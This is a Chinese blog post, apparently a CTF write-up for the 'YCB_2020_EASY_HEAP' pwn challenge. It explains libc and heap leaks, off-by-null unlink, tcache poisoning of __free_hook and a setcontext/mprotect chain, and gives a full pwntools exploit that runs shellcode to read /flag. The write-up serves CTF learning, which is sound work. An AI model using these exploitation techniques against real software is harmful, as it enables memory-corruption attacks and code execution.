<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            YCB_2020_EASY_HEAP writeup
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">YCB_2020_EASY_HEAP writeup</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2022-08-11
                        </span>
                        
                            
                                <span id="/posts/ed22203c/" class="leancloud_visitors" data-flag-title="YCB_2020_EASY_HEAP writeup">
                                    <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                                </span>
                            
                            
                                <span>
                                    <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/posts/ed22203c/"></span>
                                </span>
                              
                        
                    </p>
                    
                        
                            <span class="category-color">笔记</span>
                        
                    
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h2 id="一、分析"><a href="#一、分析" class="headerlink" title="一、分析"></a>一、分析</h2><p>首先查看题目保护：Full Relro，Canary found，NX enabled，PIE enabled</p>
<p>通过IDA查看main函数，程序主体就是一个简单的switch菜单，在while循环之前通过prctl开启了沙箱。使用seccomp-tools可以看到沙箱禁止了execve系统调用，无法使用system(‘&#x2F;bin&#x2F;sh’)。因此可能需要通过构造ROP链达到orw读取flag文件。</p>
<p>接着看菜单内部：无法指定新增指针的index，但是此处有个小逻辑：若该index处储存的指针为空，则向这个index处存放下一个申请的指针。但是index指针为什么会空呢，因为在free的时候会将对应指针置空。这么一看似乎把UAF的路给堵死了。但是参考了大佬的方法以后发现，因为malloc以后不会改变chunk中的内容，所以我们可以先free，再malloc，之后就能获取到fd和bk了。</p>
<p>在新增的时候，没有限制chunk的大小，因此这里可以自由使用各种bin attack来进行攻击。其次，存在一个比较明显的off-by-null漏洞，在之后需要利用。</p>
<h2 id="二、思路"><a href="#二、思路" class="headerlink" title="二、思路"></a>二、思路</h2><p>由于保护全开，所以第一步必须得获取到libc的基地址。这里可以使用unsorted bin leak来进行获取。首先构造一个足够大的chunk，使其在free的时候直接进入unsorted bin而不是tcache bin。接着构造一个小chunk，使其在被free的时候不会合并到top chunk中。然后将chunk 0 free掉，再malloc同样大小的chunk获取到它的指针。接着通过show操作就可以读出fd（即main_arena附近）的地址了。由于该地址和libc_base的相对位置是固定的，因此可以通过gdb查看以后直接通过偏移量得到libc_base。</p>
<p>接着需要得到heap_base，来构造后面的ROP chain。利用刚刚的chunk 1，再加一个chunk 2，再新建一个chunk 3防止合并，然后将chunk 1和chunk 2依次合并。重新分配一个空间，这个时候由于LIFO，index 1会得到chunk 2的地址。而chunk 2的FD也就是tcache_next，即chunk 1的地址。根据这个地址和heap_base的偏移量（固定值）可以算出heap_base的值。</p>
<p>接着需要利用tcache poisoning实现任意地址写。但是这个技术（参考how2heap中的<a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap/blob/master/glibc_2.27/tcache_poisoning.c">示例</a>）最好需要有可利用的指针。而本题会对free的chunk进行指针的清空。所以绕个圈子：通过off-by-null实现前向unlink，使得fake chunk被合并，再malloc就会得到这个fake chunk的指针。而这个指针可以在原本的大chunk被free的时候保留下来，从而修改已经被free的大chunk中的内容。</p>
<p>利用刚刚的chunk 1和chunk 2，构造一个fake chunk，然后将chunk 3进行free，令其与fake chunk进行合并，再申请一块内存空间，得到fake chunk的指针。</p>
<p>接着，将<strong>事先准备好的</strong>chunk 5 free掉，然后再free chunk 1。通过chunk 3的指针对tcache_next进行修改，令其为free_hook的地址。然后将chunk 1和chunk 5申请回来。此时chunk 5的指针指向free_hook的地址。对chunk 5（free_hook）进行修改，令其指向我们需要的gadget。我们需要通过这个gadget来调用setcontext达到修改寄存器的目的，所以找到了这个：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"># 0x00000000001547a0 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]</span><br></pre></td></tr></table></figure>

<p>它可以将[rdi + 8]处的值赋给rdx，并且call [rdx + 0x20]。而在free_hook运行到gadget的时候，这个rdi恰好是free的指针。所以我们构造chunk 0+8的位置写上chunk 0的地址，chunk 0+20的位置写上setcontext+61的地址。</p>
<p>setcontext会将rdx加上一系列的偏移的地址中的值放到各个寄存器中，包括rsp。所以可以在chunk 0中对应偏移的位置写入对应的值。具体可以见exp中最后一段edit(0)中的注释。接着setcontext函数返回，调用栈进入我在栈中构造的SYS_mprotect函数，并且已经通过寄存器构造好了相应的参数，使得堆中出现了一块可写的空间。</p>
<p>接着就可以继续通过ret调用堆上写好的shellcode了。由于这里不能用execve，我直接使用shellcraft自带的cat获取&#x2F;flag。如果不能使用mprotect修改堆的可执行权限，这里也可以通过构造rop链来执行orw。</p>
<h2 id="三、exp"><a href="#三、exp" class="headerlink" title="三、exp"></a>三、exp</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line">context.terminal = &quot;kitty&quot;</span><br><span class="line">context.arch = &#x27;amd64&#x27;</span><br><span class="line">debug = True</span><br><span class="line"></span><br><span class="line">if debug:</span><br><span class="line">    sh = process(&quot;./pwn&quot;)</span><br><span class="line">    libc = ELF(&quot;/home/lqz/pwn/glibc-all-in-one/libs/2.30-0ubuntu2_amd64/libc-2.30.so&quot;)</span><br><span class="line">else:</span><br><span class="line">    libc = ELF(&quot;/home/lqz/pwn/glibc-all-in-one/libs/2.30-0ubuntu2_amd64/libc-2.30.so&quot;)</span><br><span class="line">    ip = &quot;node4.buuoj.cn&quot;</span><br><span class="line">    port = 25335</span><br><span class="line">    sh = remote(ip, port)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def menu(num):</span><br><span class="line">    sh.sendlineafter(b&quot;Choice:&quot;, str(num).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(size):</span><br><span class="line">    menu(1)</span><br><span class="line">    sh.sendlineafter(b&quot;Size: &quot;, str(size).encode())</span><br><span class="line">    sh.recvline_contains(b&quot;Done!&quot;, timeout=0)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def edit(index, content):</span><br><span class="line">    menu(2)</span><br><span class="line">    sh.sendlineafter(b&quot;Index: &quot;, str(index).encode())</span><br><span class="line">    sh.sendafter(b&quot;Content: \n&quot;, content)</span><br><span class="line">    sh.recvline_contains(b&quot;Done!&quot;, timeout=0)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def dele(index):</span><br><span class="line">    menu(3)</span><br><span class="line">    sh.sendlineafter(b&quot;Index: &quot;, str(index).encode())</span><br><span class="line">    sh.recvline_contains(b&quot;Done!&quot;, timeout=0)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def show(index):</span><br><span class="line">    menu(4)</span><br><span class="line">    sh.sendlineafter(b&quot;Index: &quot;, str(index).encode())</span><br><span class="line">    # sh.recvline_contains(b&quot;Don not exist!&quot;, timeout=0)</span><br><span class="line">    # Remember to receive Content: and [+]Done!</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># Leak Heap</span><br><span class="line">add(0x40F)  # 0</span><br><span class="line">add(0x20)  # 1</span><br><span class="line">add(0x20)  # 2</span><br><span class="line">add(0x4F0)  # 3</span><br><span class="line">add(0x10)  # 4</span><br><span class="line">add(0x20)  # 5</span><br><span class="line">dele(0)</span><br><span class="line">add(0x40F)  # 0</span><br><span class="line">show(0)</span><br><span class="line">sh.recvuntil(b&quot;Content: &quot;)</span><br><span class="line">main_arena = int.from_bytes(sh.recv(0x6), &quot;little&quot;)</span><br><span class="line">success(&quot;leak_addr(main_arena): &quot; + hex(main_arena))</span><br><span class="line">libc_base = main_arena - 0x70 - libc.sym[&quot;__malloc_hook&quot;]</span><br><span class="line">libc.address = libc_base</span><br><span class="line">success(&quot;libc_base: &quot; + hex(libc_base))</span><br><span class="line">sh.recvuntil(b&quot;[+]Done!\n&quot;)</span><br><span class="line"></span><br><span class="line"># gdb.attach(sh)</span><br><span class="line"></span><br><span class="line">dele(1)</span><br><span class="line">dele(2)</span><br><span class="line">add(0x28)  # 1</span><br><span class="line">show(1)</span><br><span class="line">sh.recvuntil(b&quot;Content: &quot;)</span><br><span class="line">heap_base = int.from_bytes(sh.recv(0x6), &quot;little&quot;) &amp; 0xFFFFFFFFF000</span><br><span class="line">success(&quot;heap_base: &quot; + hex(heap_base))</span><br><span class="line">sh.recvuntil(b&quot;[+]Done!\n&quot;)</span><br><span class="line"># gdb.attach(sh)</span><br><span class="line"></span><br><span class="line">add(0x28)  # 2</span><br><span class="line">edit(1, p64(heap_base+0x6c0)+0x18*b&#x27;a&#x27;+p64(0x50))</span><br><span class="line"># 0-&gt;2-&gt;1-&gt;3-&gt;xxx chunks</span><br><span class="line">edit(2, p64(0)+p64(0x51)+p64(heap_base+0x6f0-0x18)+p64(heap_base+0x6f0-0x10))</span><br><span class="line"></span><br><span class="line"># gdb.attach(sh)</span><br><span class="line"></span><br><span class="line">dele(3)</span><br><span class="line">add(0x100) # 3</span><br><span class="line">edit(3, flat(&#123;0x18:0x31&#125;))</span><br><span class="line"></span><br><span class="line"># gdb.attach(sh)</span><br><span class="line"></span><br><span class="line">dele(5)</span><br><span class="line"># gdb.attach(sh)</span><br><span class="line">dele(1)</span><br><span class="line"># gdb.attach(sh)</span><br><span class="line"></span><br><span class="line">edit(3, flat(&#123;0x18:[</span><br><span class="line">    0x31, p64(libc.sym[&#x27;__free_hook&#x27;])[:7]</span><br><span class="line">    ]&#125;))</span><br><span class="line">success(&quot;free_hook: &quot;+hex(libc.sym[&#x27;__free_hook&#x27;]))</span><br><span class="line"># gdb.attach(sh)</span><br><span class="line">add(0x20) # 1 </span><br><span class="line">add(0x20) # 5 </span><br><span class="line"># 0x00000000001547a0 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]</span><br><span class="line">edit(5, p64(libc_base + 0x0000000000154b90))</span><br><span class="line"></span><br><span class="line"># gdb.attach(sh)</span><br><span class="line">start_addr = heap_base + 0x2a0</span><br><span class="line">edit(0, flat(&#123;</span><br><span class="line">    0: start_addr + 0x100,</span><br><span class="line">    0x8:start_addr,</span><br><span class="line">    0x20: libc.sym[&#x27;setcontext&#x27;]+61, # gadget 2</span><br><span class="line">    0xa0: start_addr, # rsp</span><br><span class="line">    0xa8: libc.sym.mprotect, # rcx</span><br><span class="line">    0x68: start_addr &amp; ~0xfff, #rdi / SYS_mprotect_addr</span><br><span class="line">    0x70: 0x4000, # rsi / SYS_mprotect_len</span><br><span class="line">    0x88: 7, # rdx / SYS_mprotect_prot</span><br><span class="line">    0x100: asm(shellcraft.amd64.linux.cat(&#x27;/flag&#x27;)),</span><br><span class="line">    &#125;, filler=&#x27;\x00&#x27;))</span><br><span class="line"></span><br><span class="line">gdb.attach(sh)</span><br><span class="line"></span><br><span class="line">dele(0)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/avatar.jpg" alt="0nlyb1ackt0a">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>0nlyb1ackt0a
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/posts/ed22203c/" target="_blank">YCB_2020_EASY_HEAP writeup</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                    <div class="category">
                        分类：
                        
                            <a href="/categories/%E7%AC%94%E8%AE%B0/">笔记</a>
                        
                    </div>
                
                
                <div class="article-prev-next">
                    
                        <a href="/posts/292aacc9/" class="prev-prefix">« </a> 上一篇：    <a href="/posts/292aacc9/" title="发布于 2024-01-17 03:39">动态规划学习笔记</a>
                        <br>
                    
                    
                        <a href="/posts/b4677c6b/" class="next-prefix">» </a> 下一篇：    <a href="/posts/b4677c6b/" title="发布于 2022-07-02 05:27">我的LINUX初始化环境配置</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>
    
 
        </div>
    
</div>
    <div id="footer">
    <div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 OnlyblackTea. All Rights Reserved.</div><div><a href='https://beian.miit.gov.cn/#/Integrated/index' target='_blank'>京ICP备19045688号-1</a> </div>
</div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>我这样的人太少了，希望大伙都能在我身上学到些什么</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/avatar.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user">
                        
                            <a href="https://onlyblacktea.cn" target="_blank"><span>0nlyb1ackt0a</span></a>
                        
                    </div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/OnlyblackTea" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>
    
    <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
    <script type="text/javascript" src="/js/APlayer.min.js"></script>
    <script type="text/javascript" src="/js/Meting.min.js"></script>
    <script>
        var meting_api = 'https://api.i-meto.com/meting/api?server=:server&type=:type&id=:id&auth=:auth&r=:r';
    </script>
    <meting-js id="313150880" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>

    <div class="wrap-right">
    <div class="wrap-right-hide">
         <div class="wrap-right-button favorites">
            <div class="iconbox" switch="false">
                <span class="iconfont icon-favorites"></span>
            </div>
            <span class="icontext">关注</span>
         </div>
        <div class="wrap-right-button search">
            <div class="iconbox">
                <span class="iconfont icon-search-menu"></span>
            </div>
            <span class="icontext">搜索</span>
        </div>
        <div class="wrap-right-button menu-button">
            <div class="iconbox">
                <span class="iconfont icon-menu"></span>
            </div>
            <span class="icontext">菜单</span>
        </div>
        <div class="wrap-right-button mode">
            <div class="light">
                <div class="iconbox">
                    <span class="iconfont icon-daymode"></span>
                </div>
                <span class="icontext">浅色模式</span>
            </div>
            <div class="dark">
                <div class="iconbox">
                    <span class="iconfont icon-nightmode-fill"></span>
                </div>
                <span class="icontext">深色模式</span>
            </div>
        </div>
        <div class="wrap-right-button bottom">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">跳至底部</span>
        </div>
    </div>
    <div class="wrap-right-show">
        <div class="wrap-right-button set">
            <div class="iconbox">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="wrap-right-button top">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
</div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "OnlyblackTea",
        GitHubRepositories : "Hexo-LiveForCode",

        User             : "0nlyb1ackt0a",
        UserAvatar       : "/image/sidebar/avatar.jpg",
        WebsiteStartDate : "2024-03-09",
        Home             : "https://onlyblacktea.cn",

        WebsiteTitleBlur         : "(◍´꒳`◍) Hi, Live For Code",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : {
            light : "/image/website/logo/logo.png",
            dark  : "/image/website/logo/logo-dark.png"
        },

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/home.jpg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "我这样的人太少了，希望大伙都能在我身上学到些什么",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.png"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/OnlyblackTea",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 1,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 OnlyblackTea. All Rights Reserved.</div><div><a href='https://beian.miit.gov.cn/#/Integrated/index' target='_blank'>京ICP备19045688号-1</a> </div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Comment : {
            switch : true,
            type   : "Valine",
        },

        Waline : {
            el              : ".comments-content",
            serverURL       : "",
            path            : window.location.pathname,
            meta            : "['nick', 'mail', 'link']",
            requiredMeta    : "['nick', 'mail']",
            pageSize        : 10,
            lang            : "zh-cn",
            locale: {
                admin       : "博主",
                anonymous   : "匿名用户",
                sofa        : "快来做第一个评论的人吧 ~",
                placeholder : "你是我一生只会遇见一次的惊喜...",
            },
            dark            : "html[color-scheme='dark']",
            search          : false,
            pageview        : true,
            comment         : true,
            copyright       : false,
        },

        Valine : {
            el             : ".comments-content",
            appId          : "RtK8Z85ddJzMy9FXZaytckfZ-MdYXbMMI",
            appKey         : "mHwHiQyPgpE4zzWrnY8v8GI1",
            serverURLs     : "https://rtk8z85d.api.lncldglobal.com",
            placeholder    : "对技术的热爱使我走到了现在",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
